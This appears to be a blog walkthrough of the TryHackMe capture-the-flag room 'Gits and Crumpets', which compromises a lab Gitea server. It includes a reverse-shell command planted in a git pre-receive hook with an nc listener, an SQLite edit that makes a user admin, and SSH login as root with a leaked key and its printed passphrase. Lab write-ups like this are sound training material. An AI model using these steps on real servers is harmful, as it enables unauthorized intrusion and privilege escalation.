Our devs have been clamoring for some centralized version control, so the admin came through. Rumour has it that they included a few countermeasures… You can access the room through this link: https://tryhackme.com/room/gitandcrumpets
Hello everyone, this is Mrinal Prakash aka EMPHAY and today I am going to take you to the walkthrough of the room- “Gits and Crumpets” which is a pretty beginner friendly room. It comes under the category of medium room. Having said all that, let me dive in.
Let me go ahead and deploy the machine
I will run an nmap scan to find the open ports against the target IP address.
After running the scan, I found that there are three services running: port 22 with ssh running, 80 with webserver running and 9090 with zeus-admin.
When I visited the site that was running on port 80 and it was redirecting me to a YouTube video.
I used the cURL command and I found a description that said the following:
So, after seeing this I immediately added git.git-and-crumpets.thm to my /etc/hosts file and then I visited that website.
I could see the register button up there and I quickly registered myself.
I went on to explore all the repos via http://git.git-and-crumpets.thm/explore/repos.
There are two repositories, I decided to check each one of them.
and I found a hint in cant-touch-this under Delete Passwords File.
It said- “Kept the password in my avatar”. So now I will get the image and extract strings to get the password.
Now login with the email firstname.lastname@example.org and the password Password.
Create a git hook (http://git.git-and-crumpets.thm/scones/cant-touch-this/settings/hooks/git).
You can edit the pre-receive to following code:
bash -i >& /dev/tcp/YOUR_IP/4577 0>&1
Start nc listener:
root@kali/home/kali/# nc -lvnp 4577
Now change the readme file (http://git.git-and-crumpets.thm/scones/cant-touch-this/_edit/master/README.md) and click save.
You should get a reverse shell:
and now we will list all the files in the present working directory and there I found user.txt file.
and there I got my user.txt which was in base64 format. So I decoded the flag to and then submitted it.
Look at the gitea database, update the current user you have to admin:
[git@git-and-crumpets tmp]$ sqlite3 /var/lib/gitea/data/gitea.db
update user set is_admin=1 where id=3;
Now you can see all repos on the scones account (http://git.git-and-crumpets.thm/admin/repos). Go to the backup repo, to the second branch, look at the commits (http://git.git-and-crumpets.thm/root/backup/commits/branch/dotfiles).
There you will find the openssh key (http://git.git-and-crumpets.thm/root/backup/commit/0b23539d97978fc83b763ef8a4b3882d16e71d32):
-----BEGIN OPENSSH PRIVATE KEY-----
-----END OPENSSH PRIVATE KEY-----
Copy this key and put it in the file /home/git/.ssh/id_rsa (dont forget chmod):
[git@git-and-crumpets .ssh]$ export TERM=xterm
[git@git-and-crumpets .ssh]$ nano /home/git/.ssh/id_rsa
# do paste (shift+insert)
# then exit and save (ctrl+x then press y)
[git@git-and-crumpets .ssh]$ chmod 600 /home/git/.ssh/id_rsa
Now login with ssh (the passphrase for the key is hinted in the backup repo: Sup3rS3cur3):
[git@git-and-crumpets .ssh]$ ssh -i id_rsa root@localhost
Enter passphrase for key 'id_rsa': Sup3rS3cur3
[root@git-and-crumpets ~]# cat /root/root.txt | base64 -d
This completes our room and that was it from me. If you enjoyed reading this, do give it a clap and follow me on medium. If you face any problem regarding any solution, feel free to reach me out. Hope you enjoyed reading my work. If you really liked this article, then follow me on medium and follow me up on Twitter and connect with me on LinkedIn. Till then goodbye from my side and Happy Hacking.